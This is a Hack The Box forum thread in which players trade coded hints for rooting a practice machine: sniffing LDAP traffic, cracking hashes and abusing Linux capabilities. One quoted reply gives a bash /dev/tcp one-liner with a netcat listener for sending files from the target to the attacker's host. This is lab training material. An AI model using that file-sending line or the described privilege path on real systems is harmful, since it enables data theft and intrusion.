• edited April 2019

    OKay rooted the box last night. I really enjoyed this box, even with bits of frustration peppered here and there. A good progression from the other begginer box, Irked. Some really fun moments mixed in with confusing moments. Thumbs up, overall. As far as tips go, this thread has everything you need to root the box, likely even within the first 6 pages. but a quick summary for those just jumping to the last page, lol

    Initial Foothold - I don't think you need any hints here!

    User - This is two parts, the first part you are going to have to take the motto of backtrak (and I think, Kali) "The quieter you become the more you hear" to heart. If privesc paths seem limited think of ways how you can capture communication between two machines. While sending something to be captured from the different services on the machine. and then to make it easy you can examine what you find on your Kali box with a well known tool that lives under water with wires. Once you find what you're looking for, think of ways to authenticate on the same machine.

    User(Part2) - The second part is your usual, most basic enumeration, look at everything you see in your new home folder and see if anything looks like it might contain interesting data. Check everything thuroughly before you move on. Then once you find what you're looking for, get it on with johnny boy or a certain hashed feline. Once you have the keys to get in to the locked out place, you'll have to check everything you find in an IDE or vim.

    Root - Eazy Peazy! There is another box on HTB that might help guide you which is named after a famous character in a book we all used to "read" as children. If you're still having trouble, think of your own capabilities and the capabilities of your kali box (wink wink). The two binaries in your new home folder are your path to root. One is a red herring, the other is the path to the pot o' gold. Don't worry about a shell, just worry about escalating your privs to be able to read (and maybe write *wink *wink). There is a certain website that helps tremndously with this, but since I don't want to give it away and make root TOO easy for you all, I'll just say its one which ippsec talks about a lot and LOVES to use when rooting linux boxes.

    Good luck and Have fun, all!

    Hack The Box

  • Can somebody help with the initial user, I am getting nothing interesting in the tc****p output. Stuck on it from 3 days. Please DM.
  • edited April 2019

    can someone PM on what to do with the trigger and listen part? I am a bit stuck, I have found there is a certain page that takes longer to respond and I am connected with SSH but not sure how to listen and how to listen

    Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

  • edited April 2019

    Good luck and have fun

  • hey guys i found ld******2 hash password, but iam really stuck now..
    can you pm me for hint?

  • Got user, and root shell!
    An awesome machine to learn a lot about linux capabilities and networking!
    Also if you google good enough there are some awesome tutorials about how to do priv esc with that.

  • Hi guys and girls!
    this is my first try on a HTB-box and I really can't get very far. All I have is a the ssh connectioj to my user account and a few dump-files from wireshark, where i cannot find any useful info yet... getting a little frustrated.

    The hints with "capabilities" etc. didn't helkp me much.
    I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

    Thanks in advance :)

  • Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance :)


  • I got some sdbm things, I don't know how to use them, hel!

  • Anyone can give me a hint towards the user? Got already some dump and some data, dont know what to do with it. Thanks!


  • I found two binaries in the dir. And found there is something related to capability
    And followed that medium article
    But still I am getting permission denied in reading files, even after applying the steps of that article properly.
    Any help? Please DM
  • Can anyone help me with the user stage? Send me a pm :)

  • edited May 2019

    Stuck at the root stage.
    Found user.txt.
    Found files in /home/ldapuser1 but don't know how to leverage them to gain root.
    Tried to search for certificates and keys to decrypt trafic in pcap but no luck.
    Any help would be appreciated.

  • Anyone available to PM me on the first user?

  • akgakg
    edited May 2019

    I have low privilege shell(using my ip) and two ldap hashes. Cracking it isn't working. What am I missing? Can someone give a nudge?
    EDIT:Got something from tcp****, but unable to modify l*** using this.

  • edited May 2019

    Ok, this was a strange box. I owned it in 2.5 hours but started to read hints in forum too early! There is more than enough written in this thread. Do not read it if you want to have more fun. This tips will be enough:

    User: & remember that you can switch users &
    Root: Inheritance

    As usual PM me if help needed :)

    If you appreciate my help, please give +1 respect :)

  • Just root'ed - really great box, learned a lot here!
    PM me if you need any help.

  • Nice Box. Learned new stuff. Good stuff.

  • currently i only got the nmap creds(lduser1&lduser2 with both the {crypts} + ssh into the box.

    and I'm trying to find a way to get into the user without cracking the hashes (as i've seen people suggest) however I cant seem to get any progress..

    Anyone got advice on how to proceed ? ( or what to listen on in the ssh-shell?)

  • Man i am just lost on this one. Can't figure out what is needed to trigger the ldap bind request i am trying to capture. If anyone can shoot me a PM on the initial user part, it would be much appreciated.


  • Type your comment> @bu77er0verfl0w said:

    Got User, working on root, I've done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files

    cat FILE >& /dev/tcp/YOUR-IP/PORT

    should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.

    Thanks for the tip! I went through the process of base64 encoding it and which was a pain.

  • Rooted
    Great box! : +1
    PM if you need a nudge :)

  • edited May 2019

    Hmm, did the t*****p phase, have hash for l*******2 but no idea how to use it. Google did not help.
    Can anyone PM me with a small hint ?

    Edit: Found it in the meantime

    Summa scientia, nihil scire.

  • Nice box. Rooted :)

    Summa scientia, nihil scire.

  • Got user, nice task. Not so fun listening to the messy traffic.
    Anyone needing help, drop me a dm.

    If someone was helpful, don't forget to give +1 Respect.

  • Rooted!
    I'm really interested how everyone else did it. Anyone fancy having a conversation on how they did it? would like to know other ways, maybe how to get shell too!

    If someone was helpful, don't forget to give +1 Respect.

  • I didn't get any lead after spending two days. Need some help to me. Anyone please.

  • How long it will take to capture the password!!
  • edited May 2019

    Nevermind! I did it.


  • Hello all, a bit late to the party, but better late than never.
    I started on this box, with optimism, and is still optimistic!
    I have read through all comments on this forum for hints along the way.
    l*******2 ok, l*******1 ok, root read ok, but have a question about root shell, anyone available for a PM?

Sign In to comment.